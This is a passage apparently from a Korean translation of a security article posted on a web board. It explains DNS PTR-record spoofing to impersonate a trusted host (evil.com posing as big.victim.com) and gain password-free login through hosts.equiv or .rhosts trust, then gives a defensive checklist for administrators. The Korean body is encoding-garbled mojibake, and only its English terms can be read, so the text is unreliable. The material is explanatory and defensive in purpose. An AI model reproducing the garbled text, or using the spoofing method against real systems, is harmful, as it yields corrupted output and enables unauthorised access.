 ¸í¹éÇÏ°Ô, host°¡ °¡Áö°í ÀÖ´Â database¿Í (NIS, DNS °Ç ¾î¶² °ÍÀ̶óµµ) ¸Â¾Æ¶³¾îÁö¸é ħÀÔÀÚ´Â host¿¡°Ô ÀÚ½ÅÀÌ trusted host¿¡¼­ Á¢¼ÓÇÑ °ÍÀ̶ó°í È®½Å½Ãų ¼ö ÀÖ´Ù. µû¶ó¼­ ÀÌÁ¦ ¾î¶² host°¡ trust µÇ´ÂÁö¸¦ ¾Ë¾Æ³»±â¸¸ Çϸé ÃæºÐÇÏ´Ù. À̰͵éÀº system administrator À̳ª ´Ù¸¥ system °èÁ¤µéÀÌ ÃÖ±Ù¿¡ Á¢¼ÓÇÑ °÷À» ¾Ë¾Æ³»´Â °ÍÀ¸·Î Å« Á¤º¸¸¦ ¾òÀ» ¼ö ÀÖ´Ù. ´Ù½Ã victim.comÀ¸·Î °¡¼­ º¸¸é root°¡ ÃÖ±Ù¿¡ Á¢¼ÓÇÑ °÷Àº big.victim.com ÀÎ °ÍÀ» ¾Ë ¼ö ÀÖ´Ù. ÀÌÁ¦ PTR record¸¦ Á¶ÀÛÇÏ¿© ¾ÕÀ¸·Î evil.com À¸·Î Á¢¼ÓÇÒ ¶§ victim.com¿¡¼­ hostname lookupÀ» Á¶ÀÛµÈ °ÍÀ¸·Î ÀνÄÇÏ°Ô ÇÏ¸é µÈ´Ù. ¸¸ÀÏ DNS database°¡ ´ÙÀ½°ú °°¾Ò´Ù¸é

<pre> 1.192.192.192.in-addr.arpa IN PTR evil.com   ÀÌ·¸°Ô ¹Ù²Ù¾î ³õÀ¸¸é µÉ °ÍÀÌ´Ù. 1.192.192.192.in-addr.arpa IN PTR big.victim.com  </pre>

 ÀÌ·¸°Ô ÇØ ³õÀ¸¸é ÀÌÁ¦ victim.com ÀÇ system software °¡ ¾ó¸¶³ª ¼øÁøÇϳĿ¡ µû¶ó¼­, ÀÌ Á¢¼ÓÀÌ big.victim.com¿¡¼­ ¿Â°ÍÀ̶ó°í ¹ÏÀ» ¼ö µµ ÀÖÀ» °ÍÀÌ´Ù. ¹°·Ð big.victim.com ÀÌ /etc/hosts.equiv ¶Ç´Â /.rhost ¿¡ ÀÖ´Ù°í °¡Á¤ÇÒ ¶§, ´ç½ÅÀº ÀÌÁ¦ password ¾øÀÌ login ÇÒ ¼ö ÀÖ°Ô µÉ °ÍÀÌ´Ù. NIS¿¡¼­ NIS master ¿¡ ÀÖ´Â host database¸¦ Á¶ÀÛÇϰųª, NIS°¡ ´ç½ÅÀÌ ¿øÇÏ´Â Á¤º¸¸¦ °ø±ÞÇϵµ·Ï ¼ÓÀ̰ųª °­¿äÇÏ´Â ÀÛ¾÷Àº ÀÌÁ¦ ´Ü¼øÇÑ ÀÏÀÌ´Ù. ´õ¿í º¹ÀâÇÏ°í Èï¹ÌÀÖ°í À§ÇèÇÑ °ø°ÝÀÌ DNS¸¦ °æÀ¯ÇÏ¿© ÇàÇØÁú ¼ö ÀÖÀ¸³ª, ÀÚ¼¼ÇÑ ³»¿ëÀº »ý·«Çϵµ·Ï ÇÑ´Ù.

 ÀÌ·¯ÇÑ °ø°Ýµé¿¡ ´ëºñÇÏ´Â µ¥¿¡´Â µÎ °¡Áö Á¤µµÀÇ ¹æ¹ýÀÌ ÀÖÀ» ¼ö Àִµ¥, ù°´Â °¡Àå Á÷Á¢ÀûÀÌÁö¸¸, ºñÇö½ÇÀûÀÎ °ÍÀÌ´Ù. ´ç½ÅÀÇ site°¡ ¾î¶² trustµµ Çã¶ôÇÏÁö ¾Ê´Â´Ù¸é ¹°·Ð ÀÌ·± ½ÄÀÇ °ø°ÝÀ» ÇÇÇÒ ¼ö ÀÖÀ» °ÍÀÌ´Ù. ´Ù¸¥ ¹æ¹ýÀº ¾ÏÈ£ÇÐÀûÀÎ ÇÁ·ÎÅäÄÝÀ» ÀÌ¿ëÇÏ´Â °ÍÀÌ´Ù. Áï secure RPC protocolÀ» ÀÌ¿ëÇÏ´Â °ÍÀÌ ÇÑ °¡Áö ¹æ¹ýÀÌ µÉ ¼ö ÀÖ´Ù. ¸¸ÀÏ ±×°ÍÀÌ ¾ÏÈ£ÇÐÀûÀ¸·Î ±úÁø´Ù ÇÒÁö¶óµµ ¾ÆÁ÷ RPC ÀÎÁõ¿¡ ´ëÇÑ ¼³°è°¡ ¾ÏȣȭµÇÁö ¾ÊÀº °Íµé¿¡ ºñÇØ ´õ ÁÁÀº ¾ÈÀü º¸ÁõÀ» ÇÒ ¼ö ÀÖ´Ù. ´Ù¸¥ ¹æ¹ýÀ¸·Î´Â hardware(smartcard)¿Í software(Kerberos)°¡ ¸ðµÎ ¹ßÀüÇÏ´Â °ÍÀε¥, ÀÌ°ÍÀº ¾ÆÁ÷ ºÒ¿ÏÀü Çϸç, system software ÀÇ ±³Ã¼°¡ ÇÊ¿äÇÏ´Ù.

¡Ý Protecting your system

 ÀÌÁ¦ Áö±Ý±îÁö ¾Ë¾Æº¸¾Ò´ø ¿©·¯ °¡Áö cracking ±â¹ýµéÀ» ÅëÇØ serverÀÇ °ü¸®Àڷμ­ ¾î¶² ÀÏÀ» ÇØ¾ß ÇÏ´Â Áö Á¤¸®ÇØ º¸ÀÚ.

  1.  Finger ¸í·ÉÀ» Á¦°ÅÇÑ´Ù. ¸¸ÀÏ Á¦°ÅÇÒ ¼ö ¾ø´Ù¸é ¼öÁ¤µÈ finger¸¦ ¼³Ä¡ÇÑ´Ù. ½ÇÁ¦¿¡¼­ userÀÇ home-directory ³ª last login source´Â °ÅÀÇ ÇÊ¿ä°¡ ¾ø´Ù.

  2.  Àý´ëÀûÀ¸·Î ÇÊ¿äÇÑ °æ¿ì°¡ ¾Æ´Ï¶ó¸é NIS¸¦ µ¹¸®Áö ¾Ê´Â´Ù. NFS´Â °¡´ÉÇÑ ÇÑ »ç¿ëÇÏÁö ¾Ê´Â´Ù.

  3.  Àý´ë·Î NFS filesystemÀ» Á¦ÇÑ ¾øÀÌ ¿ÜºÎ·Î ¹æÃâÇÏÁö ¾Ê´Â´Ù. °¡´ÉÇÏ´Ù¸é ¹æÃâµÇ´Â file systemÀº read-only·Î ÇÑ´Ù.

  4.  server¸¦ ¿ä»õÈ­ ÇÏ¿© ¹æ¾îÇÑ´Ù. (service¸¦ Á¦°øÇÏ´Â hostµéÀ» ´Ù¸¥ host·Î ¹Ù²Û´Ù.) ±×¸®°í administrative ¸¸ÀÌ ÀÌ hostµé¿¡ Çã¶ôµÈ´Ù.

  5.  inetd°ú portmapper ¿¡ ÀÇÇØ Á¦°øµÇ´Â service¸¦ ÁÖÀÇ ±í°Ô °Ë»çÇÑ´Ù. ¸¹ÀÌ »ç¿ëµÉ °Í °°Áö ¾ÊÀº °ÍµéÀº ¸ðµÎ Á¦°ÅÇÑ´Ù. "Wietse Venema's inetd wrapper"¸¦ »ç¿ëÇÑ´Ù. ÀÌ°ÍÀÌ ÀϹÝÀûÀÎ UNIX ¿¡, ƯÈ÷ network »óÀÇ °ø°Ý¿¡ ´ëÇØ Çü¿ëÇÒ ¼ö ¾ø´Â auditingÀ» °¡Á®´Ù ÁÙ °ÍÀÌ´Ù. °¡´ÉÇÏ´Ù¸é secure hostÀÇ securiy-related informationÀ» ¸ðÀ» ¼ö ÀÖ´Â loghost mechanismÀ» »ç¿ëÇÏ´Â °ÍÀÌ ÁÁ´Ù.

  6.  Àý´ëÀûÀ¸·Î ÇÊ¿äÇÑ °æ¿ì°¡ ¾Æ´Ï¶ó¸é trust¸¦ Á¦°ÅÇ϶ó. trust´Â °ð ÀûÀÌ´Ù.

  7.  ºó¾àÇÑ password¸¦ ±ÝÁöÇÏ´Â shadow password¿Í passwd command¸¦ »ç¿ëÇ϶ó. ¶ÇÇÑ »ç¿ëµÇÁö ¾Ê°Å³ª ÈÞÁöÁßÀÎ system/user account´Â Á¦°ÅÇϰųª »ç¿ë±ÝÁö ½ÃŲ´Ù.

  8.  ÇöÀçÀÇ ¹®ÇåÀ̳ª security toolÀ» ÀÐ°í »ç¿ëÇϴµ¥ µÚ¶³¾îÁöÁö ¾Ê¾Æ¾ß ÇÑ´Ù. ´Ù¸¥ »ç¶÷µé°ú security problem °ú »ç°í¿¡ ´ëÇØ À̾߱âÇ϶ó. Àû¾îµµ CERT mailing list¿Í phrack magazine Àº ¹Þ¾Æº¸¾Æ¾ß ÇÒ °ÍÀÌ´Ù. ±×¸®°í usenet security newgroup¸¦ Àоî security¿¡ ´ëÇÑ ÃֽŠÁ¤º¸¸¦ ¾Ë°í ÀÖ¾î¾ß ÇÑ´Ù. ¹«°ü½ÉÀº security ¿¡ ÀÖ¾î °¡Àå Ä¡¸íÀûÀÌ´Ù.

  9.  °¡´ÉÇÑ ÇÑ ¸ðµç vendor security patch µéÀ» ¼³Ä¡ÇÑ´Ù. Àç¹ÌÀÖ°Ôµµ ÀϹÝÀûÀÎ º¸¾È ±â¼úÀ̶ó°í ¾Ë·ÁÁø Keberos ½ÇÇàÀ̳ª, one-time password, ¶Ç´Â digital token °ú °°Àº °ÍµéÀº À§¿¡¼­ ¼Ò°³ÇÑ ±â¼úµé¿¡°Ô ºñÈ¿À²ÀûÀÌ´Ù. µû¶ó¼­ ±×·± patch µéÀ» »ç¿ëÇϱ⸦ °­·ÂÈ÷ ÃßõÇÑ´Ù. ÇÏÁö¸¸ ±×°ÍµéÀÌ ÀüºÎ°¡ ¾Æ´ÔÀº ¸í½ÉÇØ¾ß ÇÒ °ÍÀÌ´Ù. ±×°ÍµéÀº ´ç½ÅÀÌ systemÀ» ÁöÅ°±â À§ÇÑ ÅõÀïÀÇ ÀϺÎÀÏ »ÓÀ̴ϱî.

Regist Addr [ 127.0.0.1 ] ¸ñ·Ïº¸±â À­±Û ¾Æ·§±Û
Á¤±ÔÇ¥Çö½Ä [ »ó¼¼ °Ë»ö ]
Page Loading [ 0.10 Sec ] SQL Time [ 0 Sec ]

Copyleft 1999-2024 by JSBoard Open Project
Theme Designed by IDOO And follow GPL2

°³ÀÎÁ¤º¸ Ãë±Þ¹æħ ÀÌ¿ë ¾à°ü »çÀÌÆ® ¸Ê ¾îµå¹Î °ü¸®